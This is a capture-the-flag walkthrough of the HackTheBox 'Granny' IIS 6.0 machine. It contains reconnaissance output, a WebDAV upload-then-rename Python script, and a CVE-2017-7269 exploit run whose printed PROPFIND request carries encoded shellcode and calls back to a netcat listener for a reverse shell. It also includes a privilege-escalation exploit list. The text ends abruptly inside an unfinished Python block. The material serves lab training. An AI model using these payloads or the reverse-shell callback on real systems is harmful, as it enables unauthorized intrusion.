Port 53

Tech notes for tomorrow

HackTheBox Granny Walkthrough


https://app.hackthebox.eu/machines/Granny

The long battle with Granny is finally over...!

This time I'm writing up HackTheBox Granny.
The PoC wouldn't run properly, and even after escalating privileges the session dropped right after I got it, so this one was rough...


Port scan

I ran autorecon to do everything in one go and checked the nmap results first. Only port 80 is open, and it is Microsoft IIS 6.0 on Windows.
That alone doesn't give much to work with, so the web server is where to dig.

Nmap 7.91 scan initiated Sat Feb 20 17:18:52 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/results/10.10.10.15/scans/_full_tcp_nmap.txt -oX /home/kali/results/10.10.10.15/scans/xml/_full_tcp_nmap.xml 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up, received user-set (0.082s latency).
Scanned at 2021-02-20 17:18:59 JST for 165s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Microsoft IIS httpd 6.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|_  Server Date: Sat, 20 Feb 2021 08:21:42 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 20 17:21:44 2021 -- 1 IP address (1 host up) scanned in 171.49 second

Investigating the web server

Opening it in a browser just shows this.
An "Under Construction" page...


gobuster results are below. The contents of _private weren't very interesting. The _vti_* paths are FrontPage Server Extensions artifacts, which matches the MS-Author-Via: MS-FP/4.0,DAV header nikto reports next.

/Images (Status: 301) [Size: 152]
/_private (Status: 301) [Size: 156]
/_vti_bin (Status: 301) [Size: 158]
/_vti_inf.html (Status: 200) [Size: 1754]
/_vti_log (Status: 301) [Size: 158]
/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
/_vti_bin/shtml.dll (Status: 200) [Size: 96]
/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
/aspnet_client (Status: 301) [Size: 161]
/images (Status: 301) [Size: 152]
/postinfo.html (Status: 200) [Size: 2440]

nikto results. ASP.NET is in use and WebDAV is enabled; the important bit is that PUT, DELETE, MOVE and COPY are all allowed.

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    10.10.10.15
+ Target Port:        80
+ Start Time:         2021-02-20 17:19:21 (GMT9)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH COPY UNLOCK MKCOL PROPPATCH PROPFIND LOCK listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2021-02-20 17:32:46 (GMT9) (805 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Looking for a way to test WebDAV, I found a tool called davtest (tools.kali.org).

While reading about that tool I also learned that "IIS 6 has a weakness: upload an .asp disguised as .txt, then rename it over WebDAV and it will execute", and ended up at the following article (book.hacktricks.xyz). Strictly speaking this is the classic WebDAV upload-then-rename misconfiguration rather than a bug in IIS itself: the extension filter only bites on PUT, while MOVE (or COPY) can still give the file an executable extension afterwards.

So, trying davtest. Sure enough, PUT of asp/aspx fails while txt (and several other extensions) goes through. Two things worth keeping in mind: "EXEC SUCCEED" for html and txt only means the server returned them, not that anything ran, and davtest leaves its test directory and files on the target unless you pass -cleanup.

┌──(kali㉿kali)-[~]
└─$ davtest -url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: 1h3pwX
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_1h3pwX
********************************************************
 Sending test files
PUT     cgi     FAIL
PUT     asp     FAIL
PUT     aspx    FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html
PUT     shtml   FAIL
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jsp
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.cfm
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jhtml
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.pl
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.php
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt
********************************************************
 Checking for test file execution
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html
EXEC    jsp     FAIL
EXEC    cfm     FAIL
EXEC    jhtml   FAIL
EXEC    pl      FAIL
EXEC    php     FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_1h3pwX
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jsp
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.cfm
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.jhtml
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.pl
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.php
PUT File: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt
Executes: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.html
Executes: http://10.10.10.15/DavTestDir_1h3pwX/davtest_1h3pwX.txt

Checking the whatweb output from autorecon, the server advertises ASP.NET (X-Powered-By: ASP.NET, X-AspNet-Version: 1.1.4322), so asp/aspx pages do execute;
uploading as .txt and then changing the extension should be fine. This is an opening.

WhatWeb report for http://10.10.10.15:80
Status    : 200 OK
Title     : <None>
IP        : 10.10.10.15
Country   : RESERVED, ZZ

Summary   : X-Powered-By[ASP.NET], HTTPServer[Microsoft-IIS/6.0], UncommonHeaders[microsoftofficewebserver], Microsoft-IIS[6.0][Under Construction], MicrosoftOfficeWebServer[5.0_Pub]

Detected Plugins:
[ HTTPServer ]
    HTTP server header string. This plugin also attempts to 
    identify the operating system from the server header. 

    String       : Microsoft-IIS/6.0 (from server string)

[ Microsoft-IIS ]
    Microsoft Internet Information Services (IIS) for Windows 
    Server is a flexible, secure and easy-to-manage Web server 
    for hosting anything on the Web. From media streaming to 
    web application hosting, IIS's scalable and open 
  architecture is ready to handle the most demanding tasks. 

  Module       : Under Construction
  Module       : Under Construction
  Version      : 6.0
  Website     : http://www.iis.net/

[ MicrosoftOfficeWebServer ]
  Microsoft Office Web Server 

  Version      : 5.0_Pub
  Website     : http://microsoft.com/

[ UncommonHeaders ]
  Uncommon HTTP server headers. The blacklist includes all 
  the standard headers and many non standard but common ones. 
  Interesting but fairly common headers should have their own 
  plugins, eg. x-powered-by, server and x-aspnet-version. 
  Info about headers can be found at www.http-stats.com 

  String       : microsoftofficewebserver (from headers)

[ X-Powered-By ]
  X-Powered-By HTTP header 

  String       : ASP.NET (from x-powered-by string)

HTTP Headers:
  HTTP/1.1 200 OK
  Content-Length: 1433
  Content-Type: text/html
  Content-Location: http://10.10.10.15/iisstart.htm
  Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
  Accept-Ranges: bytes
  ETag: "05b3daec0d9c21:360"
  Server: Microsoft-IIS/6.0
  MicrosoftOfficeWebServer: 5.0_Pub
  X-Powered-By: ASP.NET
  Date: Sat, 20 Feb 2021 08:19:24 GMT
  Connection: close
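The upload-as-.txt-then-rename route described above can be checked without davtest. The following Python script is an added example for this write-up, not code from the original post, from davtest or from HackTricks: it parses the Allow header (the sample is a constructed copy of the one nmap and nikto reported), confirms PUT and MOVE/COPY are both on offer, and then does the PUT followed by a WebDAV MOVE with an absolute Destination URL. The target address and file names are assumptions, and the uploaded body is inert text, so the run only proves the rename goes through.

```python
"""Check a WebDAV endpoint for the upload-then-rename route.

Added example for this walkthrough; it is not code from the original post,
from davtest or from HackTricks.  The host, port and file names below are
assumptions, and SAMPLE_ALLOW is a constructed copy of the Allow header that
the nmap/nikto output above reported.
"""
import http.client
from typing import Dict, Optional, Set

# Constructed sample: the Allow header nmap/nikto reported for 10.10.10.15.
SAMPLE_ALLOW = ("OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
                "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH")


def parse_allow(header: Optional[str]) -> Set[str]:
    """Split an Allow/Public header into an upper-cased set of method names."""
    if not header:
        return set()
    return {m.strip().upper() for m in header.split(",") if m.strip()}


def upload_rename_possible(allowed: Set[str]) -> bool:
    """The trick needs PUT (write a harmless extension) plus MOVE or COPY (rename it)."""
    return "PUT" in allowed and bool({"MOVE", "COPY"} & allowed)


def move_headers(host: str, port: int, dst_path: str, overwrite: bool = True) -> Dict[str, str]:
    """Headers for a WebDAV MOVE: Destination is an absolute URL (RFC 4918)."""
    return {
        "Destination": f"http://{host}:{port}{dst_path}",
        "Overwrite": "T" if overwrite else "F",
    }


def fetch_allowed_methods(host: str, port: int = 80, path: str = "/") -> Set[str]:
    """OPTIONS request; returns the parsed Allow header (network call)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        resp.read()
        return parse_allow(resp.getheader("Allow"))
    finally:
        conn.close()


def upload_and_rename(host: str, port: int, src_path: str, dst_path: str, body: bytes) -> int:
    """PUT body to src_path (e.g. /x.txt), then MOVE it to dst_path (e.g. /x.asp).

    Returns the MOVE status: 201 (created) or 204 (overwritten) means the
    rename went through; 403/405 means the server filters MOVE as well."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    try:
        conn.request("PUT", src_path, body=body, headers={"Content-Type": "text/plain"})
        put = conn.getresponse()
        put.read()
        if put.status not in (200, 201, 204):
            raise RuntimeError(f"PUT {src_path} -> {put.status}")
        conn.request("MOVE", src_path, headers=move_headers(host, port, dst_path))
        mv = conn.getresponse()
        mv.read()
        return mv.status
    finally:
        conn.close()


if __name__ == "__main__":
    # Assumed target and file names; the body is inert text, so the renamed
    # file only proves the route works and runs nothing on the server.
    target = "10.10.10.15"
    methods = fetch_allowed_methods(target)
    print("allowed:", sorted(methods))
    if upload_rename_possible(methods):
        status = upload_and_rename(target, 80, "/probe_1h3pwX.txt", "/probe_1h3pwX.asp", b"probe")
        print("MOVE status:", status)
```

The MOVE status is the number to watch: 201 or 204 means the extension filter was PUT-only, while 403 or 405 means MOVE is filtered too and this route is closed. Delete the probe afterwards (DELETE is also allowed here); as it turns out, the write-up below takes a different route in anyway.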
  

Running the PoC

I looked up PoCs for IIS 6 and used this one (github.com) to go for a shell; it is written in Python. Going by the repository name it targets CVE-2017-7269, a stack buffer overflow in ScStoragePathFromUrl in the IIS 6.0 WebDAV component, triggered by an over-long If: header on a PROPFIND request; the request the script prints below is exactly that. So this is a memory-corruption route, independent of the upload-and-rename route above.

But the downloaded file has no extension, so you have to add one yourself.

┌──(kali㉿kali)-[~/Downloads]
└─$ cd iis6-exploit-2017-CVE-2017-7269-master 
                                                                                                                                                           
┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master]
└─$ ls
 README.md  'iis6 reverse shell'
                                                                                                                                                           
┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master]
└─$ mv 'iis6 reverse shell' PoC.py               
                                                                                                                                                           
┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master]
└─$ chmod 755 PoC.py                         
                                                                                                                                                           
┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master]
└─$ ls
PoC.py  README.md

It takes four arguments, so have them ready beforehand:

  1. Target IP address
  2. Target port number
  3. IP address the reverse shell should connect back to
  4. Port the reverse shell should connect back to

Listening with nc on port 1234 and running it, the shell landed.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 1234      
listening on [any] 1234 ...


┌──(kali㉿kali)-[~/Downloads/iis6-exploit-2017-CVE-2017-7269-master]
└─$ python PoC.py 10.10.10.15 80 10.10.14.2 1234                                                          
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃翾<ffff><ffff>Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>

I'm into Granny with a shell. That took a while...
But this isn't the usual low-privilege user: the shell runs as NT AUTHORITY\NETWORK SERVICE, the account of the IIS worker process that handled the exploited WebDAV request.

┌──(kali㉿kali)-[~]
└─$ nc -vlnp 1234      
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.15] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Poked around anyway; found the user profile directories, but neither is accessible! Shame!
getsystem doesn't work either, though that is expected: getsystem is a Meterpreter command, not a cmd.exe one, so a plain netcat shell has no idea what it is.

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\

04/12/2017  05:27 PM    <DIR>          ADFS
04/12/2017  05:04 PM                 0 AUTOEXEC.BAT
04/12/2017  05:04 PM                 0 CONFIG.SYS
04/12/2017  10:19 PM    <DIR>          Documents and Settings
04/12/2017  05:17 PM    <DIR>          FPSE_search
04/12/2017  05:17 PM    <DIR>          Inetpub
12/24/2017  08:21 PM    <DIR>          Program Files
12/24/2017  08:30 PM    <DIR>          WINDOWS
04/12/2017  05:05 PM    <DIR>          wmpub
               2 File(s)              0 bytes
               7 Dir(s)  18,094,600,192 bytes free


C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  10:19 PM    <DIR>          .
04/12/2017  10:19 PM    <DIR>          ..
04/12/2017  09:48 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  10:19 PM    <DIR>          Lakis
               0 File(s)              0 bytes
               5 Dir(s)  18,094,596,096 bytes free

C:\Documents and Settings>cd Lakis
cd Lakis
Access is denied.

C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.


C:\Documents and Settings>getsystem
getsystem
'getsystem' is not recognized as an internal or external command,
operable program or batch file.

Privilege escalation

Time for Windows-Exploit-Suggester, which served me well on Optimum.
Grabbing systeminfo first shows Windows Server 2003 Standard SP2 (x86) with a single hotfix installed (Q147222), so the box is essentially unpatched.

C:\Documents and Settings>systeminfo
systeminfo

Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 0 Hours, 11 Minutes, 9 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 799 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,334 MB
Page File: In Use:         136 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

So, here is what it suggested.

┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ python windows-exploit-suggester.py --update                                                          
[*] initiating winsploit version 3.3...
[+] writing to file 2021-04-29-mssb.xls
[*] done
                                                                                                                                                           
┌──(kali㉿kali)-[~/tools/Windows-Exploit-Suggester-master]
└─$ python windows-exploit-suggester.py --database 2021-04-29-mssb.xls --systeminfo granny_systeminfo.txt 
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*] 
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*] 
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*] 
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*] 
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*] 
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*] 
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*] 
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*]   http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*] 
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*]   https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*]   https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*] 
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*]   http://www.exploit-db.com/exploits/34458/
[*] 
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*]   http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*] 
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done
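What the suggester does first is read the systeminfo dump and compare the hotfix list against its bulletin table; the Python below is an added example that reimplements that step, not code from the post or from Windows-Exploit-Suggester. The systeminfo sample is a constructed excerpt of the Granny output above, and the bulletin-to-KB map is an illustrative assumption using the KB numbers printed in parentheses in the suggester output.

```python
"""Parse a `systeminfo` dump and compare its hotfixes against bulletins.

Added example for this walkthrough; it is not code from the post or from
Windows-Exploit-Suggester, but it does the same first step that tool does.
SAMPLE_SYSTEMINFO is a constructed excerpt of the Granny output above;
SAMPLE_BULLETINS is an illustrative map built from the KB numbers shown in
the suggester output, not the tool's bulletin database.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

SAMPLE_SYSTEMINFO = """\
Host Name:                 GRANNY
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
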